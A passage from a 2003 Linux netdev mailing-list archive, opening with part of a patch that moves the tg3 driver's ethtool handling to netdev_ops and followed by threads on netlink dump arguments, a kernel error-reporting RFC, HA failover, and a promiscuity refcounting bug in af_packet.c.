tg3_halt(tp); - tg3_init_rings(tp); - tg3_init_hw(tp); - netif_wake_queue(tp->dev); - spin_unlock(&tp->tx_lock); - spin_unlock_irq(&tp->lock); - tg3_netif_start(tp); + return r; +} - return 0; - } - case ETHTOOL_GPAUSEPARAM: { - struct ethtool_pauseparam epause = { ETHTOOL_GPAUSEPARAM }; +static void tg3_get_ringparam(struct net_device *dev, struct ethtool_ringparam *ering) +{ + struct tg3 *tp = dev->priv; - epause.autoneg = - (tp->tg3_flags & TG3_FLAG_PAUSE_AUTONEG) != 0; - epause.rx_pause = - (tp->tg3_flags & TG3_FLAG_PAUSE_RX) != 0; - epause.tx_pause = - (tp->tg3_flags & TG3_FLAG_PAUSE_TX) != 0; - if (copy_to_user(useraddr, &epause, sizeof(epause))) - return -EFAULT; - return 0; - } - case ETHTOOL_SPAUSEPARAM: { - struct ethtool_pauseparam epause; + ering->rx_max_pending = TG3_RX_RING_SIZE - 1; + ering->rx_mini_max_pending = 0; + ering->rx_jumbo_max_pending = TG3_RX_JUMBO_RING_SIZE - 1; + + ering->rx_pending = tp->rx_pending; + ering->rx_mini_pending = 0; + ering->rx_jumbo_pending = tp->rx_jumbo_pending; + ering->tx_pending = tp->tx_pending; +} - if (copy_from_user(&epause, useraddr, sizeof(epause))) - return -EFAULT; +static int tg3_set_ringparam(struct net_device *dev, struct ethtool_ringparam *ering) +{ + struct tg3 *tp = dev->priv; - tg3_netif_stop(tp); - spin_lock_irq(&tp->lock); - spin_lock(&tp->tx_lock); - if (epause.autoneg) - tp->tg3_flags |= TG3_FLAG_PAUSE_AUTONEG; - else - tp->tg3_flags &= ~TG3_FLAG_PAUSE_AUTONEG; - if (epause.rx_pause) - tp->tg3_flags |= TG3_FLAG_PAUSE_RX; - else - tp->tg3_flags &= ~TG3_FLAG_PAUSE_RX; - if (epause.tx_pause) - tp->tg3_flags |= TG3_FLAG_PAUSE_TX; - else - tp->tg3_flags &= ~TG3_FLAG_PAUSE_TX; - tg3_halt(tp); - tg3_init_rings(tp); - tg3_init_hw(tp); - spin_unlock(&tp->tx_lock); - spin_unlock_irq(&tp->lock); - tg3_netif_start(tp); + if ((ering->rx_pending > TG3_RX_RING_SIZE - 1) || + (ering->rx_jumbo_pending > TG3_RX_JUMBO_RING_SIZE - 1) || + (ering->tx_pending > TG3_TX_RING_SIZE - 1)) + return -EINVAL; - return 0; - } - case ETHTOOL_GRXCSUM: { - struct ethtool_value edata = { ETHTOOL_GRXCSUM }; + tg3_netif_stop(tp); + spin_lock_irq(&tp->lock); + spin_lock(&tp->tx_lock); - edata.data = - (tp->tg3_flags & TG3_FLAG_RX_CHECKSUMS) != 0; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_SRXCSUM: { - struct ethtool_value edata; + tp->rx_pending = ering->rx_pending; + tp->rx_jumbo_pending = ering->rx_jumbo_pending; + tp->tx_pending = ering->tx_pending; + + tg3_halt(tp); + tg3_init_rings(tp); + tg3_init_hw(tp); + netif_wake_queue(tp->dev); + spin_unlock(&tp->tx_lock); + spin_unlock_irq(&tp->lock); + tg3_netif_start(tp); - if (copy_from_user(&edata, useraddr, sizeof(edata))) - return -EFAULT; + return 0; +} - if (tp->tg3_flags & TG3_FLAG_BROKEN_CHECKSUMS) { - if (edata.data != 0) - return -EINVAL; - return 0; - } +static void tg3_get_pauseparam(struct net_device *dev, struct ethtool_pauseparam *epause) +{ + struct tg3 *tp = dev->priv; - spin_lock_irq(&tp->lock); - if (edata.data) - tp->tg3_flags |= TG3_FLAG_RX_CHECKSUMS; - else - tp->tg3_flags &= ~TG3_FLAG_RX_CHECKSUMS; - spin_unlock_irq(&tp->lock); + epause->autoneg = (tp->tg3_flags & TG3_FLAG_PAUSE_AUTONEG) != 0; + epause->rx_pause = (tp->tg3_flags & TG3_FLAG_PAUSE_RX) != 0; + epause->tx_pause = (tp->tg3_flags & TG3_FLAG_PAUSE_TX) != 0; +} - return 0; - } - case ETHTOOL_GTXCSUM: { - struct ethtool_value edata = { ETHTOOL_GTXCSUM }; +static int tg3_set_pauseparam(struct net_device *dev, struct ethtool_pauseparam *epause) +{ + struct tg3 *tp = dev->priv; - edata.data = - (tp->dev->features & NETIF_F_IP_CSUM) != 0; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_STXCSUM: { - struct ethtool_value edata; + tg3_netif_stop(tp); + spin_lock_irq(&tp->lock); + spin_lock(&tp->tx_lock); + if (epause->autoneg) + tp->tg3_flags |= TG3_FLAG_PAUSE_AUTONEG; + else + tp->tg3_flags &= ~TG3_FLAG_PAUSE_AUTONEG; + if (epause->rx_pause) + tp->tg3_flags |= TG3_FLAG_PAUSE_RX; + else + tp->tg3_flags &= ~TG3_FLAG_PAUSE_RX; + if (epause->tx_pause) + tp->tg3_flags |= TG3_FLAG_PAUSE_TX; + else + tp->tg3_flags &= ~TG3_FLAG_PAUSE_TX; + tg3_halt(tp); + tg3_init_rings(tp); + tg3_init_hw(tp); + spin_unlock(&tp->tx_lock); + spin_unlock_irq(&tp->lock); + tg3_netif_start(tp); - if (copy_from_user(&edata, useraddr, sizeof(edata))) - return -EFAULT; + return 0; +} - if (tp->tg3_flags & TG3_FLAG_BROKEN_CHECKSUMS) { - if (edata.data != 0) - return -EINVAL; - return 0; - } +static u32 tg3_get_rx_csum(struct net_device *dev) +{ + struct tg3 *tp = dev->priv; + return (tp->tg3_flags & TG3_FLAG_RX_CHECKSUMS) != 0; +} - if (edata.data) - tp->dev->features |= NETIF_F_IP_CSUM; - else - tp->dev->features &= ~NETIF_F_IP_CSUM; +static int tg3_set_rx_csum(struct net_device *dev, u32 data) +{ + struct tg3 *tp = dev->priv; + if (tp->tg3_flags & TG3_FLAG_BROKEN_CHECKSUMS) { + if (data != 0) + return -EINVAL; return 0; } - case ETHTOOL_GSG: { - struct ethtool_value edata = { ETHTOOL_GSG }; - edata.data = - (tp->dev->features & NETIF_F_SG) != 0; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_SSG: { - struct ethtool_value edata; + spin_lock_irq(&tp->lock); + if (data) + tp->tg3_flags |= TG3_FLAG_RX_CHECKSUMS; + else + tp->tg3_flags &= ~TG3_FLAG_RX_CHECKSUMS; + spin_unlock_irq(&tp->lock); - if (copy_from_user(&edata, useraddr, sizeof(edata))) - return -EFAULT; + return 0; +} - if (edata.data) - tp->dev->features |= NETIF_F_SG; - else - tp->dev->features &= ~NETIF_F_SG; +static int tg3_set_tx_csum(struct net_device *dev, u32 data) +{ + struct tg3 *tp = dev->priv; + if (tp->tg3_flags & TG3_FLAG_BROKEN_CHECKSUMS) { + if (data != 0) + return -EINVAL; return 0; } - }; - return -EOPNOTSUPP; + if (data) + dev->features |= NETIF_F_IP_CSUM; + else + dev->features &= ~NETIF_F_IP_CSUM; + + return 0; } +static struct netdev_ops tg3_netdev_ops = { + .get_settings = tg3_get_settings, + .set_settings = tg3_set_settings, + .get_drvinfo = tg3_get_drvinfo, + .get_regs_len = tg3_get_regs_len, + .get_regs = tg3_get_regs, + .get_wol = tg3_get_wol, + .set_wol = tg3_set_wol, + .get_msglevel = tg3_get_msglevel, + .set_msglevel = tg3_set_msglevel, + .nway_reset = tg3_nway_reset, + .get_link = netdev_op_get_link, + .get_ringparam = tg3_get_ringparam, + .set_ringparam = tg3_set_ringparam, + .get_pauseparam = tg3_get_pauseparam, + .set_pauseparam = tg3_set_pauseparam, + .get_rx_csum = tg3_get_rx_csum, + .set_rx_csum = tg3_set_rx_csum, + .get_tx_csum = netdev_op_get_tx_csum, + .set_tx_csum = tg3_set_tx_csum, + .get_sg = netdev_op_get_sg, + .set_sg = netdev_op_set_sg, +}; + static int tg3_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) { struct mii_ioctl_data *data = (struct mii_ioctl_data *)&ifr->ifr_data; @@ -5490,8 +5399,6 @@ static int tg3_ioctl(struct net_device * int err; switch(cmd) { - case SIOCETHTOOL: - return tg3_ethtool_ioctl(dev, (void *) ifr->ifr_data); case SIOCGMIIPHY: data->phy_id = PHY_ADDR; @@ -6773,6 +6680,7 @@ static int __devinit tg3_init_one(struct tp->rx_jumbo_pending = TG3_DEF_RX_JUMBO_RING_PENDING; tp->tx_pending = TG3_DEF_TX_RING_PENDING; + dev->netdev_ops = &tg3_netdev_ops; dev->open = tg3_open; dev->stop = tg3_close; dev->get_stats = tg3_get_stats; -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From krkumar@us.ibm.com Tue Jul 8 11:44:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 11:44:51 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68Iic2x011292 for ; Tue, 8 Jul 2003 11:44:45 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e35.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h68Ihtxe237736; Tue, 8 Jul 2003 14:43:55 -0400 Received: from us.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h68IhrPw198614; Tue, 8 Jul 2003 12:43:54 -0600 Message-ID: <3F0B10E3.9050700@us.ibm.com> Date: Tue, 08 Jul 2003 11:43:47 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" , kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com Subject: Question about netlink Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3831 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev Hi, Some of the netlink routines (eg rtnetlink_dump_ifinfo or inet6_dump_ifaddr) seem to get user arguments from cb->args['n']. However I was not able to figure out where the arguments are being set, can anyone help ? netlink_dump_start() is where the cb gets allocated (initialized to 0), and that calls netlink_dump(), which calls the assigned routine. I couldn't find where the args gets initialized to user provided values. Any pointer to what to look for is very much appreciated. Thanks, - KK From yoshfuji@linux-ipv6.org Tue Jul 8 12:03:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 12:03:24 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68J3I2x011727 for ; Tue, 8 Jul 2003 12:03:19 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h68J4YBo018135; Wed, 9 Jul 2003 04:04:34 +0900 Date: Wed, 09 Jul 2003 04:04:33 +0900 (JST) Message-Id: <20030709.040433.89038276.yoshfuji@linux-ipv6.org> To: krkumar@us.ibm.com Cc: davem@redhat.com, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com Subject: Re: Question about netlink From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <3F0B10E3.9050700@us.ibm.com> References: <3F0B10E3.9050700@us.ibm.com> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3832 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <3F0B10E3.9050700@us.ibm.com> (at Tue, 08 Jul 2003 11:43:47 -0700), Krishna Kumar says: > Some of the netlink routines (eg rtnetlink_dump_ifinfo or inet6_dump_ifaddr) seem to get > user arguments from cb->args['n']. However I was not able to figure out where the > arguments are being set, can anyone help ? Take a look at net/core/rtnelink.c:rtnetlink_dump_ifinfo() net/core/neighbour.c:neigh_dump_{info,table}() and seek the truth. :-) --yoshfuji From jkenisto@us.ibm.com Tue Jul 8 12:47:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 12:47:38 -0700 (PDT) Received: from e5.ny.us.ibm.com (e5.ny.us.ibm.com [32.97.182.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68JlJ2x012263 for ; Tue, 8 Jul 2003 12:47:26 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e5.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h68Jl5td166330; Tue, 8 Jul 2003 15:47:05 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h68Jl3nn037252; Tue, 8 Jul 2003 15:47:04 -0400 Message-ID: <3F0B1F56.D863F212@us.ibm.com> Date: Tue, 08 Jul 2003 12:45:26 -0700 From: Jim Keniston X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Andrew Morton CC: linux-kernel@vger.kernel.org, netdev@oss.sgi.com, davem@redhat.com, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org Subject: Re: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting References: <3F0AFFE6.E85FF283@us.ibm.com> <20030708105912.57015026.akpm@osdl.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3833 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jkenisto@us.ibm.com Precedence: bulk X-list: netdev If you're going to reply to this, please change "netdev@oss.sgi.net" to "netdev@oss.sgi.com" in your cc list. My apologies for the error. Jim From jkenisto@us.ibm.com Tue Jul 8 13:01:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 13:01:38 -0700 (PDT) Received: from e6.ny.us.ibm.com (e6.ny.us.ibm.com [32.97.182.106]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68K1O2x013039 for ; Tue, 8 Jul 2003 13:01:32 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e6.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h68K1Ixr171370 for ; Tue, 8 Jul 2003 16:01:19 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h68K1Ho1066990 for ; Tue, 8 Jul 2003 16:01:18 -0400 Message-ID: <3F0B22AC.1D600F98@us.ibm.com> Date: Tue, 08 Jul 2003 12:59:40 -0700 From: Jim Keniston X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: netdev Subject: [PATCH - RFC] 2.6 must-fix list - kernel error reporting Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3834 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jkenisto@us.ibm.com Precedence: bulk X-list: netdev I posted this today on LKML. I intended to post to netdev as well, but botched the address. For the actual patches, see the LKML thread, or the indicated links. *Sigh.* Jim Keniston IBM Linux Technology Center ----- Andrew Morton's 2.6 must-fix list includes the following item: > o We need a kernel side API for reporting error events to userspace (could > be async to 2.6 itself) > > (Prototype core based on netlink exists) The enclosed patches provide a mechanism for reporting error events to user-mode applications via netlink. This mechanism supplements the text-oriented printk mechanism, providing a way to log binary data or a mixture of text+binary. Patch #1, closely based on a prototype by Dave Miller, implements the NETLINK_KERROR protocol for AF_NETLINK sockets. It provides two functions for broadcasting data packets to user-mode applications: in one, the caller provides a single data buffer, and in the other, the caller provides an iovec[]. Patch #2 (see accompanying post) provides an API built on patch #1's infrastructure. Patch #2's functions capture context about the error (e.g., driver/module, severity level, in interrupt or not, pid/uid/gid, CPU ID), pack this information into a header, add the error-specific data, and send the resulting packet via netlink. The two principal functions are: - evl_write(), which accepts an arbitrarily defined buffer of error-specific data; and - evl_printf(), which accepts a format string plus args, printk-style. Rather than combining the format and args, evl_printf() keeps them separate, as various developers have suggested. Thus the receiving application can easily determine both the type of error (as indicated by the raw format string) and the args' values, without parsing the message string. Applications that respond to kernel errors can establish AF_NETLINK/NETLINK_KERROR sockets and receive the error packets directly; or they can register with an event subsystem (e.g., see evlog.sourceforge.net), which will deliver events that match specific criteria. These patches are posted on evlog.sourceforge.net. (Click on "Latest Release"; then scroll down to "evlog-2.5_kernel/evlog + netlink". Or just follow the links posted below.) Also posted there is a tar file, kerrord.tar.gz, which contains: - a sample module that logs errors using evl_write() and evl_printf(); and - a sample daemon that reads such errors from netlink and logs them. Jim Keniston IBM Linux Technology Center http://prdownloads.sourceforge.net/evlog/kerror-2.5.74.patch?download http://prdownloads.sourceforge.net/evlog/evlog-2.5.74.patch?download http://prdownloads.sourceforge.net/evlog/kerrord.tar.gz?download From bob.olszewski@cmstk.com Tue Jul 8 13:05:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 13:05:39 -0700 (PDT) Received: from corp148mr2.mcgraw-hill.com (corp148mr2.mcgraw-hill.com [198.45.18.163]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68K5U2x013399 for ; Tue, 8 Jul 2003 13:05:35 -0700 Received: by corp148mr2.mcgraw-hill.com (Switch-3.0.4/Switch-3.0.0) with SMTP id h68K43ee023114 for ; Tue, 8 Jul 2003 16:04:04 -0400 (EDT) X-Lotus-FromDomain: SPC From: bob.olszewski@cmstk.com To: netdev@oss.sgi.com Message-ID: <85256D5D.006E5858.00@spchar2.spcomstock.com> Date: Tue, 8 Jul 2003 16:05:17 -0400 Mime-Version: 1.0 Content-type: multipart/mixed; Boundary="0__=AsfbwQBSZ3ABPOlMYzrAmVy5BJLvMN0BWIEaZcE1AN429kY1IRvNzRqx" Content-Disposition: inline X-archive-position: 3835 Subject: (no subject) X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: bob.olszewski@cmstk.com Precedence: bulk X-list: netdev --0__=AsfbwQBSZ3ABPOlMYzrAmVy5BJLvMN0BWIEaZcE1AN429kY1IRvNzRqx Content-type: text/plain; charset=us-ascii Content-Disposition: inline Hi, I caught your name on a site and was wondering if you had any advise on this scenario. I'm running HA on multi-networked server, one interface (eth1) --0__=AsfbwQBSZ3ABPOlMYzrAmVy5BJLvMN0BWIEaZcE1AN429kY1IRvNzRqx Content-type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-transfer-encoding: quoted-printable =A0is a member of the HA group that customers connect to, the other (eth0) is where it ge= ts its feed from ( not running HA). =A0Problem I have, is if the feed source i= nterface (eth0) goes down the server can not deliver data. I can not run eth0 in HA, our app. on the feed source side allows only = one connection. Is there any way to config heartbeat to recognize that if a non-HA'd in= terface goes down to make the interface that "is" in an HA group fail over ? = --0__=AsfbwQBSZ3ABPOlMYzrAmVy5BJLvMN0BWIEaZcE1AN429kY1IRvNzRqx-- From krkumar@us.ibm.com Tue Jul 8 13:29:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 13:29:09 -0700 (PDT) Received: from e34.co.us.ibm.com (e34.co.us.ibm.com [32.97.110.132]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68KSq2x027846 for ; Tue, 8 Jul 2003 13:29:01 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e34.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h68KS1DG285948; Tue, 8 Jul 2003 16:28:01 -0400 Received: from us.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h68KRxPw018890; Tue, 8 Jul 2003 14:28:00 -0600 Message-ID: <3F0B294A.9060302@us.ibm.com> Date: Tue, 08 Jul 2003 13:27:54 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: yoshfuji@linux-ipv6.org CC: davem@redhat.com, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com Subject: Re: Question about netlink References: <3F0B10E3.9050700@us.ibm.com> <20030709.040433.89038276.yoshfuji@linux-ipv6.org> In-Reply-To: <20030709.040433.89038276.yoshfuji@linux-ipv6.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3836 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev I am still not convinced how it works, though I have been trying to seek the truth for some time now :-). These routines 'get' the value of args[0] and then 'set' it to the resultant value. How is this value set in the first place to the user provided value ? It seems to be initialized to ZERO in netlink_dump_start(). The only way it seems to use the value is if it gets called twice from netlink_dump(), the first time cb->args will be set to zero's while the second time it will have the values set by the first invocation to the same routine. Am I missing something or is 'args' not intended for user specified arguments ? If so, how should we access the arguments passed by the user ? Thanks, - KK YOSHIFUJI Hideaki wrote: > In article <3F0B10E3.9050700@us.ibm.com> (at Tue, 08 Jul 2003 11:43:47 -0700), Krishna Kumar says: > > >>Some of the netlink routines (eg rtnetlink_dump_ifinfo or inet6_dump_ifaddr) seem to get >>user arguments from cb->args['n']. However I was not able to figure out where the >>arguments are being set, can anyone help ? > > > Take a look at net/core/rtnelink.c:rtnetlink_dump_ifinfo() > net/core/neighbour.c:neigh_dump_{info,table}() > and seek the truth. :-) > > --yoshfuji > From greearb@candelatech.com Tue Jul 8 13:44:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 13:44:51 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68Kij2x028272 for ; Tue, 8 Jul 2003 13:44:46 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h68KiWKk015548; Tue, 8 Jul 2003 13:44:35 -0700 Message-ID: <3F0B2D30.4020102@candelatech.com> Date: Tue, 08 Jul 2003 13:44:32 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Matthew Wilcox CC: netdev@oss.sgi.com Subject: Re: [PATCH] netdev_ops References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> In-Reply-To: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3837 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Matthew Wilcox wrote: > After a conversation with acme, I realised that ethtool_ops is far too > narrow scope. What we need are netdev_ops. This patch renames the > ethtool_ops to netdev_ops and fixes some other minor flaws: > > - add _len() ops for operations which previously had to kmalloc their > own memory. > - move the netdev_ops from ethtool.h to netdevice.h > - makes some ops generic as requested by Jeff Garzik. > > I think netdev_ops is still a little too ethtool-specific; something > I'd like to do is convert the parameters to be a little less > ethtool-related. For example, instead of ->get_drvinfo, I'd like to > see ethtool_get_drvinfo() call several methods and fill in all the data > that way. > > But let's see what everyone thinks of this patch first ... > > + * Each operation is passed a &struct net_device as its first parameter. Some of these are missing their netdevice arg? > + int (*get_regs_len)(struct ethtool_regs *); > + int (*self_test_len)(struct ethtool_test *); > + int (*get_strings_len)(struct ethtool_gstrings *); > + int (*get_stats_len)(struct ethtool_stats *); -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From willy@www.linux.org.uk Tue Jul 8 14:25:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 14:25:59 -0700 (PDT) Received: from www.linux.org.uk (IDENT:ZMJsD5p6cj1AQQe+eOWA9Gi94DMngJxa@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68LPq2x002552 for ; Tue, 8 Jul 2003 14:25:53 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19ZzyB-0006GR-Cf; Tue, 08 Jul 2003 22:25:51 +0100 Date: Tue, 8 Jul 2003 22:25:51 +0100 From: Matthew Wilcox To: Ben Greear Cc: Matthew Wilcox , netdev@oss.sgi.com Subject: Re: [PATCH] netdev_ops Message-ID: <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3F0B2D30.4020102@candelatech.com> User-Agent: Mutt/1.4.1i X-archive-position: 3838 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev On Tue, Jul 08, 2003 at 01:44:32PM -0700, Ben Greear wrote: > Some of these are missing their netdevice arg? > >+ int (*get_regs_len)(struct ethtool_regs *); > >+ int (*self_test_len)(struct ethtool_test *); > >+ int (*get_strings_len)(struct ethtool_gstrings *); > >+ int (*get_stats_len)(struct ethtool_stats *); Well, they don't actually need it -- these are more attributes of the underlying driver than they are of any individual network device. I suspect at least one of them isn't needed, and I'm sure the e1000 guys are about to tell me which one ;-) -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From lunz@falooley.org Tue Jul 8 15:12:57 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 15:13:04 -0700 (PDT) Received: from orr (mail@dsl027-161-081.atl1.dsl.speakeasy.net [216.27.161.81]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68MCt2x003280 for ; Tue, 8 Jul 2003 15:12:56 -0700 Received: from lunz by orr with local (Exim 3.36 #1 (Debian)) id 19a0hT-0005NC-00; Tue, 08 Jul 2003 18:12:39 -0400 Date: Tue, 8 Jul 2003 18:12:39 -0400 To: netdev@oss.sgi.com Cc: jmorris@intercode.com.au, davem@redhat.com Subject: [PATCH RESEND 2.4, 2.5] dev->promiscuity refcounting broken in af_packet.c Message-ID: <20030708221239.GA20633@orr.falooley.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.4i From: Jason Lunz X-archive-position: 3840 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lunz@falooley.org Precedence: bulk X-list: netdev According to today's bkcvs, the below patch still hasn't been applied to 2.4 or 2.5 despite a -pre release or two, Alexey reviewed it and recommended for inclusion. James, I know you applied it to your bk tree. Will that be enough to get it into 2.4 and 2.5, or should I submit it elsewhere? Jason lunz@falooley.org said: > The problem is that packet sockets are calling dev_set_promiscuity too > many times. For example, if I take an unconfigured interface and do: > > halfoat:~ # ip link show eth1 > 9: eth1: mtu 1500 qdisc pfifo_fast qlen 100 > link/ether 00:30:48:41:62:12 brd ff:ff:ff:ff:ff:ff > halfoat:~ # ip link set up eth1 > halfoat:~ # tcpdump -i eth1 & > [1] 457 > tcpdump: WARNING: eth1: no IPv4 address assigned > tcpdump: listening on eth1 > halfoat:~ # ip link set down eth1 > tcpdump: pcap_loop: recvfrom: Network is down > [1]+ Exit 1 tcpdump -i eth1 > halfoat:~ # ip link show eth1 > 9: eth1: mtu 1500 qdisc pfifo_fast qlen 100 > link/ether 00:30:48:41:62:12 brd ff:ff:ff:ff:ff:ff > > eth1 is now in promiscuous mode because dev->promiscuity is -1 (!= 0). > > When the interface goes down, dev_change_flags calls dev_close, which > sends NETDEV_DOWN down the netdev notifier chain. Because tcpdump has a > packet socket open, packet_notifier calls packet_dev_mclist -> > packet_dev_mc -> dev_set_promiscuity. > > When tcpdump gets ENETDOWN, it aborts, closing the packet socket. > af_packet.c's proto_ops->release cleanup method is packet_release. On > close(), packet_release calls packet_flush_mclist, which again > decrements dev->promiscuity, so when tcpdump exits, 